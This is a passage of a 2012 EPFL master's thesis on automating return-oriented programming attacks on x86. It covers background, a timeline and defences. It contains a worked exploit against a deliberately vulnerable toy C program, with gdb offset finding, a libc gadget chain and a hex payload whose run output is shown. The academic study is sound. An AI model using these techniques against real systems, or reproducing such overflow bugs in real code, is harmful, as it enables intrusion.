automating return oriented attacks on x86 architecture · automating return oriented attacks on x86...

60
AUTOMATING RETURN ORIENTED ATTACKS ON x86 ARCHITECTURE School of Computer and Communication Sciences Programming Methods Group École Polytechnique Fédérale de Lausanne A degree project submitted in partial fulfilment of the requirements for the degree of Master of Computer Science of Alen Stojanov supervised by: Prof. Dr. Marin Odersky Prof. Dr. Michael Franz Lausanne, EPFL, 2012

Upload: nguyenphuc

Post on 10-Aug-2018

221 views

Category:

Documents


0 download

TRANSCRIPT

AUTOMATING RETURN ORIENTEDATTACKS

ON x86 ARCHITECTURE

School of Computer and Communication SciencesProgramming Methods GroupÉcole Polytechnique Fédérale de Lausanne

A degree project submitted in partial fulfilmentof the requirements for the degree ofMaster of Computer Science of

Alen Stojanov

supervised by:

Prof. Dr. Marin OderskyProf. Dr. Michael Franz

Lausanne, EPFL, 2012

Hard work is never in vain.

It always finds its way to pay off.

— Timko Stojanov, my father

Acknowledgements

I would like to devote my utmost gratitude to my external thesis advisor, Prof. Dr.

Michael Franz for allowing me to join his team in the Secure Systems and Software

Laboratory at the University of California, Irvine, for his expertise, kindness, and most

of all, for ensuring positive and encouraging environment for performing research.

This work would not have been completed without help and support.

I am greatly indebted to Dr. Per Larsen and Dr. Stefan Brunthaler for their trust in

me and providing me with this opportunity to acquire the knowledge and expertise

in order to contribute to the support of the research project. Gaining their trust and

friendship made my work so much smoother.

I would like to express my appreciation to Prof. Dr. Martin Odesky for giving me

the opportunity participate in this research project, as well as, for being my internal

supervisor at EPFL.

Lausanne, 16 Mars 2012 A. S.

v

Abstract

Return oriented programming (ROP) is an exploit technique which avoids code injec-

tion by reusing existing code to induce arbitrary behavior in a program. ROP attacks

are conducted by chaining available instruction sequences (gadgets) ending in a “re-

turn” instruction. While the construction of ROP attacks has been automated, these

approaches rely on searching gadgets using predefined sequences which operate on a

fixed set of registers, on the grounds that large and widely distributed chunks of binary

code are likely to contain them. As a result, libraries and operating system kernels

have been targeted as gadget providers.

We propose an automatic gadget construction, targeting stand-alone executables,

without relying on libraries or the system kernel. Due to the possible limit of available

gadgets, stand-alone executables are likely to be restricted on instructions operating

on distinct registers. Subsequently, chaining instructions so that the result of one

instruction is used in the consecutive instructions can be achieved only by moving

data across registers. For that purpose, we build a graph representing register manip-

ulation instruction sequences (mov, xchg, add, sub, etc). Each register represents a

node, and each data movement across registers represents an edge. The strongly con-

nected components in the graph provide the available registers, and the shortest paths

among those registers describe instruction chaining with minimal data movements.

Customizing the gadget search to the available registers increases the flexibility when

automatically constructing attacks, allowing the attacks to be applied on stand-alone

executables, and minimal data movements help optimize the generated attacks.

vii

Contents

Acknowledgements v

Abstract vii

Introduction 1

1 Introduction 1

1.1 Thesis outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

2 Background 3

2.1 Return Oriented Programming (x86) . . . . . . . . . . . . . . . . . . . . . 3

2.1.1 Intended and Unintended Instructions . . . . . . . . . . . . . . . 6

2.1.2 Return Oriented Programming Attack: Fibonacci Sequence . . . 6

2.2 Jump Oriented Programming . . . . . . . . . . . . . . . . . . . . . . . . . 12

2.3 Architectural aspects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

2.4 Defence Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

2.4.1 W⊗

X and ASLR . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

2.4.2 Return-Less Kernels . . . . . . . . . . . . . . . . . . . . . . . . . . 15

2.4.3 HyperCrop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16

2.4.4 ROPdefender . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

2.4.5 G-Free . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

2.4.6 Control Flow Integrity . . . . . . . . . . . . . . . . . . . . . . . . . 18

3 Related Work 21

3.1 Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

3.2 Return Into libc Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23

3.3 Reverse Engineering Intermediate Language . . . . . . . . . . . . . . . . 23

3.4 Return Oriented Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

4 Automatic Return Oriented Programming 27

4.1 Process Image Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29

4.2 Gadget Locations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

ix

Contents

4.3 Considering Gadget Side-Effects . . . . . . . . . . . . . . . . . . . . . . . 32

4.4 Gadget Classification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

4.5 Building the Register Transfer Graph . . . . . . . . . . . . . . . . . . . . . 34

4.5.1 Register Clobbering Edges . . . . . . . . . . . . . . . . . . . . . . . 36

4.5.2 Memory Transfer Nodes . . . . . . . . . . . . . . . . . . . . . . . . 37

4.6 Discovering Register Candidates . . . . . . . . . . . . . . . . . . . . . . . 37

4.7 Encapsulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38

5 Evaluation 43

6 Conclusion 456.1 Contribution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45

6.2 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46

Bibliography 50

x

1 Introduction

Software flaws or vulnerabilities are frequently the underlying causes of information

security incidents. The constantly evolving world of software, increases the complexity

of the deployed applications, and consequently it becomes increasingly difficult to

guarantee that a developed software is a bug-free software. The fundamental security

issues occur at software vendors that follow the policy of “sell today and fix it tomor-

row”, dictated by the need to launch products quickly before competitors. Therefore

producing software containing unintentional bugs and flaws is almost inevitable. Vari-

ous individual such as hackers, security firms and academic researchers are interested

in finding flaws in other vendors’ software, and are also interested in creating genuine

attack techniques to exploit the identified flaws.

Return-oriented programming (ROP) is an attack technique exploiting software vul-

nerabilities. It emerged as part of community work, and transitioned later to the

academic world, after first published by Hovav Schacham [1]. The fundamental use of

this technique is to induce arbitrary behaviour in a program whose control flow has

been diverted, without injecting any code. The threat of ROP attacks is eminent across

many architectures including x86, ARM, SPARC, Atmel AVR, PowerPC, etc [1, 2, 3, 4, 5].

As a result, many day-to-day devices are affected, including smart phones and tablets

running on ARM architecture, even voting machines [6], used during elections in the

past.

The popularity of ROP is mainly based on its ability to bypass almost all widely de-

ployed protection mechanisms, such as W⊗

X and ASLR [7, 8, 9]. The current de-

velopments in defence techniques produce systems that either introduce excessive

performance overhead, ere able to detect / protect against ROP in a very constrained

environment, or simply are not deployed on systems they are designed to protect

[10, 11, 12, 13, 14, 15]. Subsequently many techniques are being developed to autom-

atize the ROP attack generation [16, 17, 18, 19]. Most of the techniques target shared

1

Chapter 1. Introduction

libraries, or operating system kernels, which in fact represent environments with a

large pool of reusable chunks of binary code (gadgets). The process of automation

depends on matching predefined set of template instructions, operating on fixed set

of CPU registers.

Our focus in this thesis report are stand-alone executables, where the availability of

reusable code is significantly reduced, due to the size of the binary. As a result, the

generation of code reuse attacks on stand-alone binaries, is quite tedious, even when

done manually. Our system automatize the creation of ROP attacks by:

• Automatically extracting gadgets from a target binary

• Careful consideration on the side effects introduced by execution of each gadget

• Analysis on the data transfer between registers and memory

• Automatic gadget chaining using the data transfer relations between the CPU

registers and memory

Finally we analyse a set of popular applications available across different Linux distri-

bution, and show that the automatic creation of ROP attacks is possible and is directly

dependant on the size of the target binary.

1.1 Thesis outline

The rest of the thesis report is organized as follows:

• Chapter 2 gives a detailed explanation on the fundamental of the code reuse at-

tacks, their evolution and variations, provides a through generation of a practical

attack, and discusses the unassailability of the current defence mechanisms.

• Chapter 4 defines the contribution in this project, providing comprehensive

elaboration on mechanisms used to automate the generation of return oriented

attacks.

• Chapter 5 presents the results obtained using the system to generate automatic

return oriented attacks, provides comparison with other systems and evaluates

the level of automation achieved on variety of stand-alone executables.s

• Finally, the conclusion and future work ideas are covered in Chapter 6

2

2 Background

Building software, that provides an adequate level of security assurance, becomes

increasingly challenging as the size and the complexity of software creation increases.

Developers are burden not only to deliver a correct and optimal solution to a problem,

but they must also ensure that they have protected every relevant potential vulner-

ability. Yet, in order to attack a particular software, attackers often have to find and

exploit only a single exposed vulnerability.

The traditional vulnerabilities are represented by buffer overflow on the stack [20],

buffer overflow on the heap [21], integer overflows [22] and format string vulnerabili-

ties [23]. The techniques to exploit any of the vulnerabilities mentioned above vary per

architecture and operating system. Return oriented programming exhibits another

technique that utilizes the existence of a vulnerability in creating arbitrary attacks such

that it applies to many widely deployed architectures. Attacker using this technique

must accomplish two tasks: he must find some way to subvert the program’s control

flow from its normal course, and he must force the program to act in the manner of his

choosing. Therefore, we concentrate on the classical stack-smashing vulnerabilities

and describe the fundamentals of this technique.

2.1 Return Oriented Programming (x86)

Return oriented programming (ROP) is a technique to force computers to behave

maliciously without injecting malicious code in the system. Assuming that a vulnera-

bility is discovered in a particular program, an attacker is able to subvert the program

control from its normal course by indirectly executing cherry-picked machine instruc-

tions or groups of machine instructions already present in the program. As a result,

the technique circumvents most widely deployed measures that try to prevent the

execution originating from user-controlled memory [7].

3

Chapter 2. Background

The very first academic work describing the technique of return oriented program-

ming was published by Hovav Shacham’s “The Geometry of Innocent Flesh on the

Bone: Return-into-libc without function Calls (on the x86)” [1]. However, the idea

of code reuse attacks has been drifting around mailing lists, forums and computer

security magazines long before it was acknowledged by the academic world. Inspired

by the discovery of the buffer overflow vulnerability, the technique improved overtime,

as shown on the retrospective timeline bellow.

1972 • First publication on buffer overflow attacks [24]

1988 • “The Moris” worm released [25]

1995 • Initial rediscovery of buffer overflow attacks [26]

1996 • Step-by-step introduction for exploiting stack-based buffer overflow [20]

1997 • Non-executable stack patches are defeated [27]

1997 • “Instruction chaining” first introduced on BugTraq [28]

1999 • Return to lib(c) is introduced on Solaris / SPARC [29]

2000 • Community discussion on code reuse techniques [30]

2001 • Advanced attacks using return to lib(c) are introduced [31]

2001 • Core Red Worm infects more than 300.000 PCs, using code reuse techniques [32]

2005 • Exploitation on x86-64 using borrowed code chunks [33]

2007 • Return Oriented Programming by Hovav Shacham [1]

2008 • ROP attacks on harvard-architecture devices [4]

2008 • Router exploitation using ROP on PowerPC architecture [5]

2008 • Generalization of ROP attacks on RISC [2]

2009 • REIL return oriented programming on ARM [3]

2009 • Exploiting AVC voting machines [6]

2009 • Rootkits for the Windows kernel using ROP [19]

2010 • Framework for automated architecture independent search [18]

2010 • Return Oriented Programming without returns [34]

2010 • Corelan releases pvefindaddr to simplify the exploit building process

2011 • Jump Oriented Programming defined [35]

2011 • Advanced techniques: packed, printable, and polymorphic ROP [36]

2011 • Cross-architectural ROP attacks by libc function chaining [17]

To illustrate the essence of a return oriented attack we assume that the target is a

4

2.1. Return Oriented Programming (x86)

Linux binary having a stack buffer overflow vulnerability, as mentioned above. As soon

as the binary is loaded by the operating system, it becomes a Linux process having

the corresponding libraries mapped into memory. The text segment of the process,

as well as the memory mapped regions, contain chunks of binary code. Once the

vulnerability of the program is exploited, we assume that the return address of the

stack is overwritten. If the value of the overwritten address points to a valid machine

instruction that resides in one the sections containing binary code, the control flow of

the program will be subverted to sequentially execute the instructions starting at the

overwritten address. If the set of following instructions ends with a return instruction,

the control flow of the program will be subverted again to the next address available

on the stack. We call this set of instructions gadgets.

...0x555A08 EAX = “white”0x555A0C RETURN

Display_ColorText

...0xABCD00 SUBI #5000, @EBX0xABCD04 RETURN

Audio_LowerVolume

...0x777700 JSR strg_concat_EAX_EBX0x777704 RETURN

FileSystem_DirectoryName

...0x212500 EBX = “keyboard”0x212504 else0x212508 EBX = “mouse”0x21250C RETURN

HelpTexts_IOSpecific

...0x919100 JSR open_connection0x919104 RETURN

PrintManager_Prepare

0x00000000

Data Segment

BSS segment

Heap

Stack

Text Segment

Memory Mapping

Illustration of a simplified jail-break attack using Return Oriented

Programming

Gadgets are located in the executable memory segments of the process

0xb70001E0

0xb70001C0

0xb70001A0

0xb7000180

0xb7000160

0xb7000140

0x00555A08

0xb7000120

0x00212508

0xb7000100

0x00ABCD00

0xb70000E0

0x00777700

0xb70000C0

0x00919100

0xb70000A0

0xb7000080

0xb7000240

0xb7000220

0xb7000200

EAX: whiteEBX:

EAX: whiteEBX: mouse

EAX: whiteEBX: house

EAX: whitehouseEBX: house

connected to whitehouse

Figure 2.1: Simplified jail-break attack using ROP

By carefully aligning addresses on the stack, chosen from gadgets available in the

5

Chapter 2. Background

target, the attacker can induce arbitrary behaviour in the system. Figure ?? illus-

trates simplified jail-break ROP attack on a Linux binary. It easy to see how harmless

and common instruction segments can modify the state of the application to cause

malevolent behaviour.

2.1.1 Intended and Unintended Instructions

The x86 architecture has a variable instruction length ranging from 1 byte to 15 bytes

per instruction and has no alignment on the binary code. The CPU is therefore able

to fetch binary code at any location in memory, and execute it, if the bytes of that

code represent valid x86 instructions. For example, we assume that the following

instruction is given:

8d bc 31 d6 07 37 c3 lea -0x3cc8f82a(%ecx,%esi,1), %edi

If we disregard the first two bytes, and start from the third byte, we get a complete

different set of instructions:

31 d6 xor %edx, %esi07 pop %es37 aaac3 ret

As a result, we define two sets of instructions intended and unintended instructions

[37]. Since we are interested in instructions ending with a return statement, repre-

sented with the c3 or c2 bytes, any unindented instruction ending with those bytes

can be considered as candidate for the ROP attack, if it decodes to a valid x86 instruc-

tion. How often such instructions occur depend on the characteristic of the machine

language in question, which Shacham [1] calls it geometry of the language, claiming

that in any sufficiently large body of x86 executable code there will exist sufficiently

many useful code sequences to cause the exploited program to undertake arbitrary

computation’.

2.1.2 Return Oriented Programming Attack: Fibonacci Sequence

To illustrate a practical ROP attack, we use a dummy program, which has a buffer

overflow bug. The program dummy.c source is the following:

1 #include <stdio.h>2 #include <string.h>3 #include <stdlib.h>

6

2.1. Return Oriented Programming (x86)

4

5 int main(int argc , char *argv [])6 {7 unsigned char buf [1];8 read(0, buf , 2048);9 printf ("%c\n", buf [0]);

10 return 0;11 }

Obviously any input greater than 1 character will potentially lead to a Segmentation

fault. The program is compiled with gcc 4.4.5-8 on Debian 5.0 (x86), and linked

with libc 2.11-1:

astojanov@debian-vbox:~/workspace/fROP$ ldd dummylinux-gate.so.1 => (0xb7fe4000)libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb7e97000)/lib/ld-linux.so.2 (0xb7fe5000)

This means that we can use the gadgets available in the binary, as well as the gadgets

linked to libc. Before the ROP attack is crafted, we need to calculate the offset on the

stack where the return address resides. Note that the offset length varies on different

distributions and different compilers. The offset is determined experimentally using

gdb, by feeding the input of the dummy program with a random number of characters.

We start with 7 ’x’ characters:

(gdb) file dummyReading symbols from dummy...(no debugging symbols found)...done.(gdb) runStarting program: dummyxxxxxxxxProgram exited normally.

This listing above shows that than 7 bytes are not enough to overwrite the return

address. Therefore we repeat the same process with 15 bytes of input characters:

(gdb) runStarting program: dummyxxxxxxxxxxxxxxxxProgram received signal SIGSEGV, Segmentation fault.0xb70a7878 in ?? ()

7

Chapter 2. Background

In this case, the program fails with a segmentation fault, as a result of overwritten

return address. As the return address is consisted of 32 bits, we can notice that 2

bytes of the address are overwritten with the ASCII code of ’x’ character, which in

this case is 78. Thus, we can conclude that stack offset to the return address is 13

bytes. In order to implement the logic of the Fibonacci sequence, the first step is to

find available gadgets. We use a modified version of the Galileo algorithm [1], looking

at c3 and c2 bytes and backtracking from those bytes to find valid x86 instruction.

Similarly pop reg followed by jmp reg instructions are also considered, since the

combination of those instruction is equivalent to a return instruction. The search

resulted in obtaining 18419 gadgets from the binary and the corresponding linked

libraries (libc and linux-gate).

The initial observation over the functionality of the obtained gadget is the use of the

pop gadgets. The pop instruction pops an element from the stack, increasing the value

of the esp. Since values are placed on the stack when crafting a ROP attack, each use

of the pop instruction will result in populating the value of the register with the next

address on the stack as illustrated on Figure 2.2. Therefore this type of gadgets can be

used to initialize values of registers.

pop %edireturn

Figure 2.2: pop gadgets used for initialization

In our Fibonacci attack, registers edx and edi will be used as numbers Fn and Fn+1

in the Fibonacci sequence (initialized with values 1 and 2). The attack is represented

descriptevly, such that each line indicates the gadget sequential count, the address of

the gadget, the hex descriptions of the bytes of that gadget, as well as the assembly

translation of those bytes:

01: 0xB7F6E16D: hexa:"5a |c3" text:"pop %edx ; ret"02: 0x0000000103: 0xB7F4CD28: hexa:"5f |c3" text:"pop %edi ; ret"04: 0x00000001

Ecx will be used to track the number count in the sequence. We initialize it with value

10, to calculate the 10th Fibonacci number, and decrease it twice, since we already

have the first two numbers (ebx is initialized with a junk value):

05: 0xB7F6E197: hexa:"59 |5b |c3" text:"pop %ecx ; pop %ebx ; ret"

8

2.1. Return Oriented Programming (x86)

06: 0x0000000A07: 0xDEADBEEF08: 0xB7F5D116: hexa:"ff c9 |c3" text:"dec %ecx ; ret"09: 0xB7F5D116: hexa:"ff c9 |c3" text:"dec %ecx ; ret"

We now start the loop. In order to use gadget at position #13, we must ensure that the

instruction incl 0x5D5B14C4(%ebx) will write to a writeable section in the memory

process. Therefore we initialize ebx with value of 0x62A4E2D4, which will result in

increasing the value of address 0xBFFFF798 by the gadget at position 13.

10: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"11: 0x62A4E2D4

The next 3 instructions depict the “Fibonacci magic”. esi serves as a temorpary

variable and we have: esi = edx, edx = edi and finally edi = edi + esi

12: 0xB7F0964F: hexa:"89 d6 |c3" text:"mov %edx, %esi ; ret"13: 0xB7F9E479: hexa:"89 fa |ff 83 c4 14 5b 5d |c3"

text:"mov %edi, %edx ; incl 0x5D5B14C4(%ebx) ; ret "14: 0xB7EBFF62: hexa:"01 f7 |c2 00 00" text:"add %esi, %edi ; ret"

Conditional branching is one of the most challenging parts of the ROP. In order to

implemented it, we use the CF flag. Namely this flag is changed every time certain

instructions are used, usually when an overflow occurs as a result of performing

subtraction or addition. Therefore we can use this flag to determine whether a < b,

since this flag will be set when performing a−b if the condition is valid. In this context

the value of ecx is compared with 1:

15: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"16: 0xB7F6131A: hexa:"83 e8 01 |c3" text:"sub $0x01, %eax ; ret"17: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"

Once the CF flag is set, lahf is used to load the flag into the least significant bit of ah.

18: 0xB7F5CD5D: hexa:"9f |c3" text:"lahf ; ret"

Currently CF is already loaded into eax, therefore we shift eax 4 bits to the right, so it

gets value of 0 or 64, according to the initial value of CF flag.

19: 0xB7F65659: hexa:"25 00 01 00 00 |c3" text:"and $0x100,%eax ; ret"20: 0xB7EF5D47: hexa:"c1 f8 02 |c3" text:"sar $0x02, %eax ; ret"

9

Chapter 2. Background

In order to do the conditional jump, we use the value of eax to modify the esp. Since

eax holds the value of 64 or 0, we can add eax to esp. This will result in either going

to the next gadget address on the stack, or 64/4 = 16 addresses later. However espcan not be modified directly and we need 5 gadgets to set its value. We take this into

consideration and offset esp for 5 32bit addresses via ebx. Note that esp gets added

into ebp on position #25 and gets the stack address of that instruction.

21: 0xB7F82DD3: hexa:"5d |c3" text:"pop %ebp ; ret"22: 0x0000000023: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"24: 0x0000001425: 0xB7F3CBC2: hexa:"03 ec |c3" text:"add %esp, %ebp ; ret "26: 0xb7ff5e6a: hexa:"01 eb |c3" text:"add %ebp, %ebx ; ret "27: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"28: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret "29: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"30: 0xB7FCD854: hexa:"94 |c2 00 00" text:"xchg %esp, %eax ; ret"

If the control flow of the attack reaches position #31, that means that CF was 0 on

position #16. This also means that our representation of the N number, which gets

decreased on every iteration (inst 15 - 17), is greater or equal to 1. We need to jump

back to the start of the loop. Note that ebx still holds the value of esp+0x14 obtained

at instruction 26. Therefore we need to jump back to position #10. Therefore, we need

to decrease esp for 16 positions, and subtract the offset of 0x14. That is: 16 ·4+ 0x14

= 84 (0x54). We load -0x54 in eax and use the same trick to modify the value of esp.

31: 0xB7F64321: hexa:"58 |c3" text:"pop %eax ; ret"32: 0x0000005433: 0xB7F9E996: hexa:"f7 d8 |c3" text:"neg %eax ; ret"34: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"35: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret "36: 0xB7F61F8B: hexa:"91 |c2 00 00" text:"xchg %ecx, %eax ; ret"37: 0xB7FCD854: hexa:"94 |c2 00 00" text:"xchg %esp, %eax ; ret"

Since the control flow jumps for 0 or 16 positions, esp will never point to this part of

the stack. Therefore, it is a free space, and we can use it to display a message on the

screen stating that Fibonacci sequence has been completed.

38: 0x6f626946: "Fibo"39: 0x6363616e: "nacc"40: 0x6f642069: "i do"41: 0x202e656e: "ne. "

10

2.1. Return Oriented Programming (x86)

42: 0x206e7552: "Run "43: 0x6f686365: "echo"44: 0x0a3f2420: " $?\n"45: 0x00000000: ""46: 0x00000000:

If position #47 is reached, that means that N is 0, and we are done with the Fibonacci

sequence. The last thing left is to somehow reproduce the result. The first thing we do

is call sys_write system call, and we inform the user that calculation of Fibonacci

has completed.

In order to print on the screen using the system call, ecx is set to the address of

instruction 38. ebx is set to 1 (so it writes to the standard output) and edx is set to 29,

which is 0x1d, representing the size of the string being written. eax must be set to 1,

to represent the proper system call

47: 0xB7F6E197: hexa:"59 |5b |c3" text:"pop %ecx ; pop %ebx ; ret "48: 0x0000003049: 0x0000000050: 0xb7ff5e6a: hexa:"01 eb |c3" text:"add %ebp, %ebx ; ret "51: 0xB7F60B8C: hexa:"01 d9 |c3" text:"add %ebx, %ecx ; ret "52: 0xB7F4C31E: hexa:"5b |c3" text:"pop %ebx ; ret "53: 0x0000000154: 0xB7F6E16D: hexa:"5a |c3" text:"pop %edx ; ret"55: 0x0000001d56: 0xB7F64321: hexa:"58 |c3" text:"pop %eax ; ret"57: 0x0000000458: 0xb7fe3830: hexa:"cd 80 |c3" text:"int $0x80 ; ret"

Finally transfer the value of edi (the n-th Fibonacci) and write it to the exit code of

the program using system call again.

59: 0xB7F6E198: hexa:"5b |c3" text:"pop %ebx ; ret"60: 0x62A4E2D461: 0xB7F9E479: hexa:"89 fa |ff 83 c4 14 5b 5d |c3"

text:"mov %edi, %edx ; incl 0x5D5B14C4(%ebx) ; ret"62: 0xB7F518C2: hexa:"89 d3 |c3" text:"mov %edx, %ebx ; ret"63: 0xb7ff8efc: hexa:"31 c0 |c3" text:"xor %eax, %eax ; ret"64: 0xb7fe82c3: hexa:"40 |c3" text:"inc %eax ; ret"65: 0xb7fe3830: hexa:"cd 80 |c3" text:"int $0x80 ; ret"

Once the addresses are taken into consideration, and the rest of the description in

terms of bytes and text is stripped, the binary payload will look as follows (generated

by bvi viewer):

11

Chapter 2. Background

00000000 78 78 78 78 78 78 78 78 78 78 78 78 78 6D E1 F6 xxxxxxxxxxxxxm..00000010 B7 01 00 00 00 28 CD F4 B7 01 00 00 00 97 E1 F6 .....(..........00000020 B7 0A 00 00 00 EF BE AD DE 16 D1 F5 B7 16 D1 F5 ................00000030 B7 98 E1 F6 B7 D4 E2 A4 62 4F 96 F0 B7 79 E4 F9 ........bO...y..00000040 B7 62 FF EB B7 8B 1F F6 B7 1A 13 F6 B7 8B 1F F6 .b..............00000050 B7 5D CD F5 B7 59 56 F6 B7 47 5D EF B7 D3 2D F8 .]...YV..G]...-.00000060 B7 00 00 00 00 98 E1 F6 B7 14 00 00 00 C2 CB F3 ................00000070 B7 6A 5E FF B7 8B 1F F6 B7 8C 0B F6 B7 8B 1F F6 .j^.............00000080 B7 54 D8 FC B7 21 43 F6 B7 54 00 00 00 96 E9 F9 .T...!C..T......00000090 B7 8B 1F F6 B7 8C 0B F6 B7 8B 1F F6 B7 54 D8 FC .............T..000000A0 B7 46 69 62 6F 6E 61 63 63 69 20 64 6F 6E 65 2E .Fibonacci done.000000B0 20 52 75 6E 20 65 63 68 6F 20 24 3F 0A 00 00 00 Run echo $?....000000C0 00 00 00 00 00 97 E1 F6 B7 30 00 00 00 00 00 00 .........0......000000D0 00 6A 5E FF B7 8C 0B F6 B7 1E C3 F4 B7 01 00 00 .j^.............000000E0 00 6D E1 F6 B7 1D 00 00 00 21 43 F6 B7 04 00 00 .m.......!C.....000000F0 00 30 38 FE B7 98 E1 F6 B7 D4 E2 A4 62 79 E4 F9 .08.........by..00000100 B7 C2 18 F5 B7 FC 8E FF B7 C3 82 FE B7 30 38 FE .............08.00000110 B7 .

When the payload is used as an input to the dummy program, the following results

are obtained:

astojanov@debian-vbox:~/workspace/fROP$ ./dummy < payload.binxFibonacci done. Run echo $?astojanov@debian-vbox:~/workspace/fROP$ echo $?89

2.2 Jump Oriented Programming

As mentioned before, ROP as a concept, can be instrumented in many ways and

applied on different architectures. Return oriented programming without returns

[34], introduced on x86 and ARM architectures, is another method to implement ROP

attacks. In this method, instead of looking for gadgets ending in a return instruction,

the emphasis is on gadgets ending in the return-like instructions sequences of the form

“pop reg; jmp reg” on the x86 architecture and the update-load-branch return-like

instruction on the ARM architecture. Many other equivalent instruction sequences are

also considered, as gadgets ending in a an indirect jump instructions, where combined

with even a single update-load-branch instruction sequence it is possible to build

a reusable trampoline which will transfer the control-flow of the attack to the next

instruction. The author proves that in sufficiently large libraries, as libc, it is possible

12

2.3. Architectural aspects

to build a gadget set of Turing-complete functionality to build arbitrary attacks.

...0x555A08 EAX = “white”0x555A0C JMP

Display_ColorText

...0xABCD00 SUBI #5000, @EBX0xABCD04 JMP

Audio_LowerVolume

...0x777700 JSR strg_concat_EAX_EBX0x777704 JMP

FileSystem_DirectoryName

...0x212500 EBX = “keyboard”0x212504 else0x212508 EBX = “mouse”0x21250C JMP

HelpTexts_IOSpecific

...0x919100 JSR open_connection0x919104 JMP

PrintManager_Prepare

0x00555A08

0x00212508

0x00ABCD00

0x00777700

0x00919100

Dispacher

Figure 2.3: Jump Oriented Programming

Jump-oriented programming presents another variation of return oriented program-

ing to be also proven Turing-complete. The new approach eliminates the reliance on

the stack and return instructions seen in return-oriented programming. Unlike ROP,

where after the execution of a particular gadget, the control flow returns back to the

stack to follow the next address, JOP performs an uni-directional control-flow transfer

to its target. Instead of having gadgets ending in a return instruction, each gadget

in a JOP attack ends in a jmp instruction. The attack relies on a dispatcher gadget,

which essentially maintains a virtual program counter able to navigate the gadgets to

advance from one gadget to the other, as illustrated on Figure 2.3

2.3 Architectural aspects

The fact that return oriented programming represents an universal thread, can be

easily elucidated by the fact that ROP attacks are not limited to variable length in-

structions such as x86. Architecture as RISC / SPARC, share almost no properties with

the x86 architecture. As the SPARC architecture has a fixed-width instruction length,

and alignment is enforced on instruction read, unintended instruction are no longer

possible to be used when crafting the return oriented attacks, which significantly re-

duces the set of available gadgets. However stack overflow are still possible on SPARC

13

Chapter 2. Background

and the rich set of register, combined with the 4000 return instructions in the Solaris

libc implementation was shown to be enough to create ROP attacks [2].

Similarly to the SPARC architecture, the thread of ROP has also been extended to

support another RISC architecture, namely ARM [3], affecting many smart-phones

and mobile and embedded devices. Although the implementation and the focus

of this work was on Windows Mobile, the technique can be ported on any other

operating system based on the architecture. The real-world use case of ROP has also

been depicted when AVC Advantage Harvard machines were shown to be exploitable

[6], which were used as a voting machines for elections in United States in the past.

Other affected architectures are also Atmel AVR [4] and Power PC [5].

2.4 Defence Techniques

The discovery of the first buffer overflow attack, initiated the need to develop adequate

protection mechanisms to address the potential vulnerabilities. As the sophistication

of the attacks was increasing, many techniques were developed to mitigate against

code reuse attacks. Taking into account strong adversaries, the effectiveness of those

systems can still be challenged to show that ROP and its variations still exists as a valid

thread, especially in environments where those systems are not deployed.

2.4.1 W⊗

X and ASLR

Stack smashing attacks, when initially discovered, were quite popular, as the exploita-

tion of those vulnerabilities was quite simple. As soon as the attacker was able to

change the return address on the stack, it was also possible to inject an arbitrary

machine code on the stack, directing the machine to execute the injected code. To

address this issue, the “W⊗

X” protection model emerged, marking memory regions

as writeable or executable, but never both. Therefore, the model prevented the at-

tackers to inject attack code, as diverting the control flow of the program would have

caused a processor exception. Being a sufficiently strong mitigation, the model was

soon adopted by CPU manufactures, by the name NX bit (No eXecute), and was incor-

porated in many modern operating systems. Intel introduced the XD bit, AMD the

Enhanced Virus Protection, and ARM the XN bit. Microsoft implemented Data Execu-

tion Prevention (DEP) [38], supporting software and hardware based data protection,

Linux adopted PaX [7] to utilize the NX bit, as well as to emulate it, on architectures

where it was not supported. Red Had introduced ExecShield [9]. Mac OS X, FreeBSD,

OpenBSD, NetBSD, Solaris and Andorid also incorporated the protection mechanisms

in their implementation.

14

2.4. Defence Techniques

W⊗

X as a protection model was only able to provide security until the code reuse

attacks appeared. To palliate against the new approaches, address space layout ran-

domization (ASLR) [8] was introduced. The model enforces random arrangement of

libraries, heap and stack space within process address space. The arbitrary offsets

in the dynamic libraries, as well as the heap and stack space hinder the creation of

ROP attacks, especially return-to-libc attacks, hardening the prediction of the position

of the gadget used in the attacks. Similarly to the W⊗

X, ASLR was incorporated

as part of PaX in Linux and OpenBSD, Microsoft included implementation in DEP,

followed by Mac OS X, iOS and Android. Although ASLR resembles a very strong

mitigation against code reuse attacks, it was latter demonstrated how this system

can be bypassed by a derandomization attack [39], converting any standard buffer

overflow attack to affect systems where ASLR is enabled. The derandomization attack

exploited the fact that ASLR does not randomize the stack layout, by brute-forcing the

attack to pinpoint the location of libc. Having into consideration that it only took

216 seconds to compromise Apache, the derandomization attack can be used in a

scenario where it can locate the positions of a gadgets to initiate a ROP attack.

2.4.2 Return-Less Kernels

Building an operating system with return-less kernel was an attempt to remove the

threat of return oriented attacks designated to escalate access privileges in the operat-

